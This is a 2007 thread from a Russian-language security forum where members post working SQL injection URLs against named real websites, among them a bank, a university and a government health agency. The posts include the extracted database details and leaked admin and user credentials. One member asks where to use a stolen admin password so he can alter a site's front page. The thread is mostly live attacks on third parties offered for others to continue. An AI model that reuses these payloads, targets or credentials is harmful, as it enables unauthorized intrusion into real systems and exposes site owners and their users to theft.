HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.11.2007, 18:03
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Италия

Код:
http://www.megalab.it/articoli.php?id=220&pagina=-2+union+select+concat_ws(char(58),user(),version(),database())/*
megalabdb@localhost:5.0.37-log:megalab

Код:
http://www.aduc.it/dyn/comunicati/comu_mostra.php?id=999999999999999+union+select+1,2,concat_ws(char(58),user(),version(),database()),4/*
aduc@localhost:5.0.26:aducdb

Код:
http://www.sodalitas.it/news.php?ID=-222+union+select+1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46/*
sod78as68@localhost:4.1.20:Sql945as

Код:
http://www.corvorosso.it/pagine/articoli.php?id=-1021+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
corvo29@web2-rodonet.rodonet.it:5.0.24a-Debian_9ubuntu2-log:corvo

Код:
http://www.ghislieri.it/pagina.php?id=-104+union+select+1,2,3,4,5,6,7,8/*
rettorato@localhost:5.0.27-log:rettorato
 
Ответить с цитированием

  #2  
Старый 26.11.2007, 18:37
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
По умолчанию

http://www.onboard.ru
Код:
http://www.onboard.ru/resort/?id=-1+union+select+user()/*
 
Ответить с цитированием

  #3  
Старый 26.11.2007, 19:49
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Италия

Код:
http://www.millenniumcampaign.it/standup/newsDett.php?id=-36+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5/*
ML2693_usoft@81.88.49.2:4.1.22-standard-log:millenniumcampaign_it_standup2007



edu

Код:
http://blogsforlearning.msu.edu/articles/view.php?id=-6+union+select+1,2,3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #4  
Старый 26.11.2007, 19:56
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию

ОАО «Белвнешэкономбанк»
Код:
http://www.bveb.by/news/index.php?ItemNumber=-1+union+select+1,2,3,4,5,6,7,8,9,1,2/*
Кому интересно, копайте дальше... (:
 
Ответить с цитированием

  #5  
Старый 26.11.2007, 21:56
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

код:

http://inbox.net.ua/index.php?id=900&show=news&newsid=-3462+union+select+1,table_name,3+from+information_ schema.tables+limit+992,1/*

большая бд,стоит фильтрация на скобки
__________________________________________
достаточно большой сайт

код:
http://www.femina.com.ua/cgi-bin/board.cgi?page=694&zrazdel=-3+union+select+1,concat(username,0x3a,user_passwor d)+from+phpbb_users+limit+1,1/*&pages=1046

5 версия мускула,много таблиц

админ на форуме admin:atvbyf

__________________________________________

тоже не маленький сайт

код:

http://wantbaby.info/guide/glossary/?Term=-5+union+select+1,concat(table_schema,0x3a,table_na me,0x3a,column_name),3,4,5,6,7,8,9+from+informatio n_schema.columns/*

вывод-"все сразу"
 
Ответить с цитированием

  #6  
Старый 26.11.2007, 22:07
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

www.strawtec.com.au
Код:
http://www.strawtec.com.au/content.php?id=<sql-inj>
4.1.12a-nt-max:strawtec@localhost:strawbale
Код:
strawtecadmin:snowfall88
strawtec:Phil Egan
brett:trustno1
 
Ответить с цитированием

  #7  
Старый 26.11.2007, 22:20
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
Exclamation

Официальный сайт хоккейного клуба «Рязань»
Код:
http://hcryazan.ru/about_user.php?id=-1+union+select+1,concat_ws(0x3a,name,pass,mail,icq),3,mail,icq,pass,6,7,8,9+from+users/*
Эт база всех юзеров - ник пароль мыло ася
Admin : secret : admin@hc-rzn.org.ru : 399828412
помогите найти, куда пароль вводить для админа.
З.Ы: если кто за них болеет, не обижайтесь
Код:
http://www.shadowknights.ru/index.php?id=-1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13/*

Последний раз редактировалось Mike 007; 26.11.2007 в 22:35..
 
Ответить с цитированием

  #8  
Старый 26.11.2007, 22:24
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

Цитата:
Сообщение от Mike 007  
помогите найти, куда пароль вводить для админа. хочу изменить главную стр.
З.Ы: если кто за них болеет, не обижайтесь
Дефэйсы запрещаются АНТИЧАТОМ!
 
Ответить с цитированием

  #9  
Старый 26.11.2007, 22:29
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
Talking

zamut
понятно, никаких дефейсов!
за что ж вы так с моей репой?

Последний раз редактировалось Mike 007; 26.11.2007 в 22:39..
 
Ответить с цитированием

  #10  
Старый 27.11.2007, 01:37
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

Код:
http://www2a.cdc.gov/phlp/dailynews/default.asp?specific=1%20and%201=convert(int,@@version)--
Цитата:
'Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) '
Код:
http://www2a.cdc.gov/phlp/dailynews/default.asp?specific=1%20and%201=convert(int,@@servername)--
Цитата:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'QPHP-ATL-PROD1' to a column of data type int.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.